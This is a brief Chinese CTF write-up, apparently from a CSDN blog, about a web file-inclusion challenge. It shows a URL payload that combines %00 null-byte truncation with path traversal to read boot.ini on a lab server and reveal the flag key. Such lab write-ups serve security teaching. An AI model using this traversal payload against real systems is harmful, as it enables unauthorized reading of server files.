CTF---Web---文件包含---04---%00截断

本文介绍了CTF中的一道Web文件包含题目,重点是利用%00截断技巧来获取flag。通过构造payload如`boot.ini%00`并结合路径匹配`.../.../.../.../`,成功从URL`http://172.16.15.192/stage/8/show.php?name=boot.ini%00&path=test/.../.../.../.../`中揭示了key——8DB4DDF1C46E764A。总结中强调了%00截断在GET和POST请求中的应用,并提供相关参考资料。
摘要由CSDN通过智能技术生成


前言

题目分类:

CTF—Web—文件包含—04—%00截断


一、题目描述

题目: 文件包含—boot.ini

http://172.16.15.192/stage/8/show.php?name=says&path=test/
在这里插入图片描述

二、解题步骤

1、 构造payload

step1:修改name值,截断%00,还有路径匹配,即可爆出key:8DB4DDF1C46E764A

http://172.16.15.192/stage/8/show.php?name=boot.ini%00&path=test/…/…/…/…/
在这里插入图片描述


三、总结

1、%00截断,此题为get方式的截断,还有post传参,参考链接

2、…/…/…/…/为路径匹配,

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值